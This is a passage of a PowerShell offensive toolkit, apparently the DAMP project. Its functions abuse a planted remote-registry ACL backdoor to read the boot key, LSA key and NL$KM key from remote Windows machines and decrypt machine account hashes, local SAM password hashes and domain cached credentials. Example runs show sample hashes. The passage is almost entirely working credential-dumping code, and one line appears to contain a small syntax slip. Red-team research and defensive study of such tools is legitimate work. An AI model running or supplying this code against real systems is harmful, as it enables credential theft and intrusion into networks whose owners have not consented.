$Result).Message)" return } $LSAKeyEncryptedStruct = New-Object Byte[] $Size $Result = $Advapi32::RegQueryValueEx($pKey,$Null,0,[ref]0,$LSAKeyEncryptedStruct,[ref]$Size) if($Result -ne 0) { $LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error() Write-Error "[$Computer] Error enumerating the SECURITY\Policy\PolEKList key, part 2: $(([ComponentModel.Win32Exception] $Result).Message)" return } # calculate the temp key by using the boot key to calculate the Sha256 hash on the first 32 bytes # of the LSA key data $LSAEncryptedData = $LSAKeyEncryptedStruct[28..($LSAKeyEncryptedStruct.Count)] $TmpKey = Get-LsaSha256Hash -Key $BootKey -Data $LSAEncryptedData[0..31] # use the temp key to decrypt the rest of the LSA struct $LSAKeyStructCipherText = $LSAEncryptedData[32..($LSAEncryptedData.Count)] $LSAKeyStructPlaintext = Decrypt-AES -Key $TmpKey -CipherText $LSAKeyStructCipherText $LSAKey = $LSAKeyStructPlaintext[68..99] $LSAKey } function Get-RemoteNLKMKey { <# .SYNOPSIS Helper that retrieves the NL$KM key from a remote registry instance. This key us used to encrypt cached credentials. Author: Matt Nelson (@enigma0x3), Lee Christensen (@tifkin_), Will Schroeder (@harmj0y) License: BSD 3-Clause Required Dependencies: PSReflect .DESCRIPTION Takes a remote registry handle and uses the RegOpenKeyEx/RegQueryValueEx API calls to extract the encrypted LSA bytes from the SECURITY\Policy\Secrets\NL$KM\CurrVal key and decrypts this key using the passed LSA key. .PARAMETER hKey Specifies the handle to the remote registry instance to retrieve the NL$KM key from. .PARAMETER LSAKey A byte array containing the decrypted LSA Key. #> [CmdletBinding()] Param( [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] [ValidateNotNullOrEmpty()] [IntPtr] $hKey, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [Byte[]] $LSAKey ) [IntPtr]$sKey = [System.IntPtr]::Zero $Result = $Advapi32::RegOpenKeyEx($nKey,'SECURITY\Policy\Secrets\NL$KM\CurrVal',0,0x19,[ref]$sKey) if($Result -ne 0) { $LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error() Write-Error "[$Computer] Error opening the SECURITY\Policy\Secrets\NL`$KM\CurrVal key: $(([ComponentModel.Win32Exception] $Result).Message)" return } [Int]$Size = 0 $Result = $Advapi32::RegQueryValueEx($sKey, $Null, 0, [ref]0, $Null, [ref]$Size) if($Result -ne 0) { $LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error() Write-Error "[$Computer] Error querying the SECURITY\Policy\Secrets\NL`$KM\CurrVal key: $(([ComponentModel.Win32Exception] $Result).Message)" return } $CurrVal = New-Object Byte[] $Size $Result = $Advapi32::RegQueryValueEx($sKey, $Null, 0, [ref]0, $CurrVal, [ref]$Size) if($Result -ne 0) { $LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error() Write-Error "[$Computer] Error querying the SECURITY\Policy\Secrets\NL`$KM\CurrVal key, part 2: $(([ComponentModel.Win32Exception] $Result).Message)" return } # calculate the temp key by using the LSA key to calculate the Sha256 hash on the first 32 bytes # of the extracted NL$KM encrypted data $EncryptedData = $CurrVal[28..($CurrVal.Count)] $TempKey = Get-LsaSha256Hash -Key $LSAKey -Data $EncryptedData[0..31] # decrypt the NL$KM key cipher text using the composite temp key $HashStructCipherText = $EncryptedData[32..($EncryptedData.Count)] $HashStructPlaintext = Decrypt-AES -Key $TempKey -CipherText $HashStructCipherText $HashBytes = $HashStructPlaintext[16..79] $HashBytes } function Get-RemoteMachineAccountHash { <# .SYNOPSIS Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local machine account hash for the specified machine. Author: Matt Nelson (@enigma0x3), Lee Christensen (@tifkin_), Will Schroeder (@harmj0y) License: BSD 3-Clause Required Dependencies: PSReflect, Get-RemoteBootKey, Get-LsaSha256Hash, Decrypt-AES, MD4 assembly .DESCRIPTION Opens up the remote registry instance specified by -ComputerName, retrieves the SysKey/bootkey with Get-RemoteBootKey, uses the BootKey to decrypt the LSA key, and finally uses the LSA key to decrypt the MachineAccount hash of the remote system. .PARAMETER ComputerName Specifies the hostname to retrieve the local machine account hash for. Defaults to localhost. .EXAMPLE Get-RemoteMachineAccountHash -Computername client.external.local -Verbose VERBOSE: Bootkey/SysKey : 0AF496ADE2F34BB46BF052392F97F310 VERBOSE: LSA Key : 0C6EA4CAAC7B8165C0E5890F0C2D7254E044A93C361588CDB4B6C2874ABF0D67 ComputerName MachineAccountHash ------------ ------------------ client.external.local 66A94EF4523795A785531A5AD4213165 .LINK http://moyix.blogspot.com/2008/02/decrypting-lsa-secrets.html https://raw.githubusercontent.com/pwnieexpress/metasploit-framework/master/data/exploits/powershell/powerdump.ps1 https://www.win.tue.nl/~aeb/linux/hh/Hackers_Hut_Windows_passwords.pdf #> [CmdletBinding()] Param( [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] [Alias('dnshostname', 'HostName', 'name')] [ValidateNotNullOrEmpty()] [String[]] $ComputerName = $Env:COMPUTERNAME ) # good reference on this process: http://moyix.blogspot.com/2008/02/decrypting-lsa-secrets.html ForEach($Computer in $ComputerName) { # connect to the registry on the remote system [IntPtr]$nKey = [System.IntPtr]::Zero # 0x80000002 == HKEY_LOCAL_MACHINE $Result = $Advapi32::RegConnectRegistry("\\$($Computer)", 0x80000002, [ref]$nKey) if($Result -ne 0) { $LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error() Write-Error "[$Computer] Error connecting to remote registry: $(([ComponentModel.Win32Exception] $Result).Message)" return } # extract the bootkey from the remote registry $BootKey = Get-RemoteBootKey -hKey $nKey # extract the LSA key from the remote registry using the bootkey $LSAKey = Get-RemoteLSAKey -hKey $nKey -BootKey $BootKey Write-Verbose ("Bootkey/SysKey : " + ([System.BitConverter]::ToString($BootKey) -replace '-','')) Write-Verbose ("LSA Key : " + ([System.BitConverter]::ToString($LSAKey) -replace '-','')) # extract out the encrypted machine account data [IntPtr]$sKey = [System.IntPtr]::Zero $Result = $Advapi32::RegOpenKeyEx($nKey,'SECURITY\Policy\Secrets\$MACHINE.ACC\CurrVal',0,0x19,[ref]$sKey) if($Result -ne 0) { $LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error() Write-Error "[$Computer] Error opening the SECURITY\Policy\Secrets\`$MACHINE.ACC\CurrVal key: $(([ComponentModel.Win32Exception] $Result).Message)" return } [Int]$Size = 0 $Result = $Advapi32::RegQueryValueEx($sKey, $Null, 0, [ref]0, $Null, [ref]$Size) if($Result -ne 0) { $LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error() Write-Error "[$Computer] Error querying the SECURITY\Policy\Secrets\`$MACHINE.ACC\CurrVal key: $(([ComponentModel.Win32Exception] $Result).Message)" return } $CurrVal = New-Object Byte[] $Size $Result = $Advapi32::RegQueryValueEx($sKey, $Null, 0, [ref]0, $CurrVal, [ref]$Size) if($Result -ne 0) { $LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error() Write-Error "[$Computer] Error querying the SECURITY\Policy\Secrets\`$MACHINE.ACC\CurrVal key, part 2: $(([ComponentModel.Win32Exception] $Result).Message)" return } # calculate the temp key by using the LSA key to calculate the Sha256 hash on the first 32 bytes # of the extracted machine account data $EncryptedData = $CurrVal[28..($CurrVal.Count)] $TempKey = Get-LsaSha256Hash -Key $LSAKey -Data $EncryptedData[0..31] # decrypt the machine account key cipher text using the composite temp key $MachineHashStructCipherText = $EncryptedData[32..($EncryptedData.Count)] $MachineHashStructPlaintext = Decrypt-AES -Key $TempKey -CipherText $MachineHashStructCipherText $MachineHashBytes = $MachineHashStructPlaintext[16..255] # MD4 hash the resulting machine account hash bytes to create the resulting # machine account NTLM hash $MD4 = [JetBlack.Authorisation.Utils._MD4]::Create() $Out = $MD4.ComputeHash($MachineHashBytes) $MachineAccountHash = ([System.BitConverter]::ToString($Out) -replace '-','').ToLower() $Out = New-Object PSObject $Out | Add-Member Noteproperty 'ComputerName' $Computer $Out | Add-Member Noteproperty 'MachineAccountHash' $MachineAccountHash $Out } } function Get-RemoteLocalAccountHash { <# .SYNOPSIS Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local SAM account hashes for the specified machine. This is essentially a re-coded remote version of Kathy Peters, Josh Kelley (winfang) and Dave Kennedy (ReL1K)'s PowerDump.ps1 script (https://raw.githubusercontent.com/pwnieexpress/metasploit-framework/master/data/exploits/powershell/powerdump.ps1) Author: Matt Nelson (@enigma0x3), Lee Christensen (@tifkin_), Will Schroeder (@harmj0y) License: BSD 3-Clause Required Dependencies: PSReflect .DESCRIPTION Opens up the remote registry instance specified by -ComputerName, retrieves the SysKey/bootkey with Get-RemoteBootKey, uses the BootKey to calculate the HBootKey, and uses the HBootKey to decrypt local user account hashes. .PARAMETER ComputerName Specifies the hostname to retrieve the local machine account hash for. Defaults to localhost. .EXAMPLE Get-RemoteLocalAccountHash -ComputerName client.external.local -Verbose VERBOSE: Bootkey/SysKey : 0AF496ADE2F34BB46BF052392F97F310 VERBOSE: HBootKey : F9C4F5E09770D65FD8987ED5D36BC800CE7820C228B04F1E6AF0D929CA7D168E ComputerName : client.external.local UserName : Administrator UserRID : 500 UserLMHash : aad3b435b51404eeaad3b435b51404ee UserNTLMHash : 31d6cfe0d16ae931b73c59d7e0c089c0 ComputerName : client.external.local UserName : Guest UserRID : 501 UserLMHash : aad3b435b51404eeaad3b435b51404ee UserNTLMHash : 31d6cfe0d16ae931b73c59d7e0c089c0 ComputerName : client.external.local UserName : admin UserRID : 1000 UserLMHash : aad3b435b51404eeaad3b435b51404ee UserNTLMHash : 2b576acbe6bcfda7294d6bd18041b8fe .LINK http://moyix.blogspot.com/2008/02/syskey-and-sam.html https://raw.githubusercontent.com/pwnieexpress/metasploit-framework/master/data/exploits/powershell/powerdump.ps1 https://www.win.tue.nl/~aeb/linux/hh/Hackers_Hut_Windows_passwords.pdf #> [CmdletBinding()] Param( [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] [Alias('dnshostname', 'HostName', 'name')] [ValidateNotNullOrEmpty()] [String[]] $ComputerName = $Env:COMPUTERNAME ) # more details on the process: http://moyix.blogspot.com/2008/02/syskey-and-sam.html # another good reference: https://www.win.tue.nl/~aeb/linux/hh/Hackers_Hut_Windows_passwords.pdf ForEach($Computer in $ComputerName) { # connect to the registry on the remote system [IntPtr]$nKey = [System.IntPtr]::Zero $Result = $Advapi32::RegConnectRegistry("\\$($Computer)", 0x80000002, [ref]$nKey) if($Result -ne 0) { $LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error() Write-Error "[$Computer] Error connecting to remote registry: $(([ComponentModel.Win32Exception] $Result).Message)" return } # grab the bootkey from the remote registry $Bootkey = Get-RemoteBootKey -hKey $nKey # calculate the HBootKey value # adapted from from https://raw.githubusercontent.com/pwnieexpress/metasploit-framework/master/data/exploits/powershell/powerdump.ps1 # credit to Kathy Peters, Josh Kelley (winfang) and Dave Kennedy (ReL1K) $AQwerty = [Text.Encoding]::ASCII.GetBytes("!@#$%^&*()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(*@&%`0") $ANum = [Text.Encoding]::ASCII.GetBytes("0123456789012345678901234567890123456789`0") $RemoteReg = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey("LocalMachine", $Computer) $RemoteKey = $RemoteReg.OpenSubKey("SAM\SAM\Domains\Account") [Byte[]]$F = $RemoteKey.GetValue("F") $RC4key = [Security.Cryptography.MD5]::Create().ComputeHash($F[0x70..0x7F] + $AQwerty + $Bootkey + $ANum) $HBootKey = ConvertTo-Rc4ByteStream -InputObject $F[0x80..0x9F] -Key $RC4key Write-Verbose ("Bootkey/SysKey : " + ([System.BitConverter]::ToString($Bootkey) -replace '-','')) Write-Verbose ("HBootKey : " + ([System.BitConverter]::ToString($HBootKey) -replace '-','')) # enumerate all the local user account subkey values available $RemoteUserKeys = $RemoteReg.OpenSubKey('SAM\SAM\Domains\Account\Users') $UserKeys = $RemoteUserKeys.GetSubKeyNames() | ? {$_ -Match '^[0-9A-Fa-f]{8}$'} # for each local user account subkey extract out the encrypted password bytes # and decrypt them using Decrypt-Hash to get the resulting LM/NT hash ForEach($UserKey in $UserKeys) { $UserRID = [Convert]::ToInt32($UserKey, 16) $RemoteUserKey = $RemoteReg.OpenSubKey("SAM\SAM\Domains\Account\Users\$UserKey") [Byte[]]$V = $RemoteUserKey.GetValue('V') $Offset = [BitConverter]::ToInt32($V[0x0c..0x0f],0) + 0xCC $Len = [BitConverter]::ToInt32($V[0x10..0x13],0) $UserName = [Text.Encoding]::Unicode.GetString($V, $Offset, $Len) $UserHashOffset = [BitConverter]::ToUInt32($V[0x9c..0x9f],0) + 0xCC [Byte[]]$EncLMHash = $Null [Byte[]]$EncNTHash = $Null if (($UserHashOffset + 0x28) -lt $V.Length) { $LMHashOffset = $UserHashOffset + 4 $NTHashOffset = $UserHashOffset + 8 + 0x10 $EncLMHash = $V[$($LMHashOffset)..$($LMHashOffset+0x0f)] $EncNTHash = $V[$($NTHashOffset)..$($NTHashOffset+0x0f)] } elseif (($UserHashOffset + 0x14) -lt $V.Length) { $NTHashOffset = $UserHashOffset + 8 $EncNTHash = $V[$($NTHashOffset)..$($NTHashOffset+0x0f)] } # decrypt the raw encrypted bytes using Decrypt-Hash $NTHashRaw = Decrypt-Hash -RID $UserRID -HBootKey $HBootKey -EncHash $EncNTHash -HashType 'NT' $LMHashRaw = Decrypt-Hash -RID $UserRID -HBootKey $HBootKey -EncHash $EncLMHash -HashType 'LM' $NTHash = [BitConverter]::ToString($NTHashRaw).Replace('-', '').ToLower() $LMHash = [BitConverter]::ToString($LMHashRaw).Replace('-', '').ToLower() $Out = New-Object PSObject $Out | Add-Member Noteproperty 'ComputerName' $Computer $Out | Add-Member Noteproperty 'UserName' $UserName $Out | Add-Member Noteproperty 'UserRID' $UserRID $Out | Add-Member Noteproperty 'UserLMHash' $LMHash $Out | Add-Member Noteproperty 'UserNTLMHash' $NTHash $Out } } } function Get-RemoteCachedCredential { <# .SYNOPSIS Abuses the ACL backdoor set by Add-RemoteRegBackdoor to retrieve domain cached credentials from a remote machine. Author: Matt Nelson (@enigma0x3), Lee Christensen (@tifkin_), Will Schroeder (@harmj0y) License: BSD 3-Clause Required Dependencies: PSReflect, Get-RemoteBootKey, Get-LsaSha256Hash, Decrypt-Bytes .DESCRIPTION Opens up the remote registry instance specified by -ComputerName, retrieves the SysKey/bootkey with Get-RemoteBootKey, uses the BootKey to decrypt the LSA key, and finally uses the LSA key to decrypt the cached credentials of the remote system. .PARAMETER ComputerName Specifies the hostname to retrieve the local cached credentials for. Defaults to localhost. .EXAMPLE Get-RemoteCachedCredential -Computername client.external.local -Verbose Retrieves the domain cached credentials (MsCacheV2) from client.external.local. .LINK http://moyix.blogspot.com/2008/02/decrypting-lsa-secrets.html #> [CmdletBinding()] Param( [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] [Alias('dnshostname', 'HostName', 'name')] [ValidateNotNullOrEmpty()] [String[]] $ComputerName = $Env:COMPUTERNAME ) # good reference on this process: http://moyix.blogspot.com/2008/02/decrypting-lsa-secrets.html ForEach($Computer in $ComputerName) { # connect to the registry on the remote system [IntPtr]$nKey = [System.IntPtr]::Zero # 0x80000002 == HKEY_LOCAL_MACHINE $Result = $Advapi32::RegConnectRegistry("\\$($Computer)", 0x80000002, [ref]$nKey) if($Result -ne 0) { $LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error() Write-Error "[$Computer] Error connecting to remote registry: $(([ComponentModel.Win32Exception] $Result).Message)" return } $RemoteReg = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey('LocalMachine', $Computer) # extract the bootkey from the remote registry $BootKey = Get-RemoteBootKey -hKey $nKey # extract the LSA key from the remote registry using the bootkey $LSAKey = Get-RemoteLSAKey -hKey $nKey -BootKey $BootKey # extract the NL$KM key from the remote registry using the bootkey $NLKMKey = Get-RemoteNLKMKey -hKey $nKey -LSAKey $LSAKey Write-Verbose ("Bootkey/SysKey : " + ([System.BitConverter]::ToString($BootKey) -replace '-','')) Write-Verbose ("LSA Key : " + ([System.BitConverter]::ToString($LSAKey) -replace '-','')) Write-Verbose ("NL`$KM Key : " + ([System.BitConverter]::ToString($NLKMKey) -replace '-',' ')) # enumerate all the cached entry values available $RemoteCacheKeys = $RemoteReg.OpenSubKey('Security\Cache') $CacheKeys = $RemoteCacheKeys.GetValueNames() | ? {$_ -Match '^NL\$[0-9]+$'} # Check value of NL$IterationCount, if set to 0, then output decrypted hash as MsCache # for each local cached entries # reference for the structure: https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/cachedump.rb#L218-L250 ForEach($CacheKey in $CacheKeys) { $RawData = $RemoteCacheKeys.GetValue($CacheKey) $EncryptedData = $RawData $UserNameLength = [BitConverter]::ToInt16($EncryptedData[0..1], 0) $DomainNameLength = [BitConverter]::ToInt16($EncryptedData[2..3], 0) $UserRID = [BitConverter]::ToInt32($EncryptedData[16..19], 0) $FullDomainLength = [BitConverter]::ToInt16($EncryptedData[60..61], 0) # $THi = [BitConverter]::ToInt32($EncryptedData[32..35], 0) # $TLow = [BitConverter]::ToInt32($EncryptedData[36..39], 0) $CH = $EncryptedData[64..79] if ($UserNameLength -ne 0) { $Temp = $EncryptedData[96..$($EncryptedData.Length)] if ( ($EncryptedData.Length % 16) -ne 0 ) { [Byte[]]$CipherText = @(0) * ($EncryptedData.Length + (16 - ($EncryptedData.Length % 16))) } else { [Byte[]]$CipherText = @(0) * ($EncryptedData.Length) } [Array]::Copy($Temp, $CipherText, $Temp.Length) $CachePlaintext = Decrypt-Bytes -Key $NLKMKey[0..15] -CipherText $CipherText -InitV $CH # first 16 bytes of the decrypted result are the username $MsCacheV2 = ([System.BitConverter]::ToString($CachePlaintext[0..15]) -replace '-','').ToLower() # the rest of the bytes are the hash and metadata $Plaintext = $CachePlaintext[72..$($CachePlaintext.Length)] # grab utf-16le encoding $Encoding = New-Object System.Text.UnicodeEncoding($False, $False.,$True) # the next chunk is the variable-length username $User = $Encoding.GetString($Plaintext[0..($UserNameLength - 1)]) # then we have the domain shortname $Domain = $Encoding.GetString($Plaintext[($UserNameLength)..($UserNameLength + $DomainNameLength - 1)]) if ([byte][char]$Domain[0] -eq 0) { $Domain = $Encoding.GetString($Plaintext[($UserNameLength + 2)..($UserNameLength + $DomainNameLength + 1)]) # and finally the domain fullname $FullDomain = $Encoding.GetString($Plaintext[($UserNameLength + $DomainNameLength + 2)..($FullDomainLength + $UserNameLength + $DomainNameLength + 1)]) } else { # and finally the domain fullname $FullDomain = $Encoding.GetString($Plaintext[($UserNameLength + $DomainNameLength )..($FullDomainLength + $UserNameLength + $DomainNameLength - 1)]) } $Out = New-Object PSObject $Out | Add-Member Noteproperty 'ComputerName' $Computer $Out | Add-Member Noteproperty 'UserRID' $UserRID $Out | Add-Member Noteproperty 'User' "$Domain\$User" $Out | Add-Member Noteproperty 'Domain' $FullDomain $Out | Add-Member Noteproperty 'MsCacheV2' $MsCacheV2 $Out } } $RemoteReg.Close() } } ########################################################################### ## END OF Directly from DAMP Toolkit ## ###########################################################################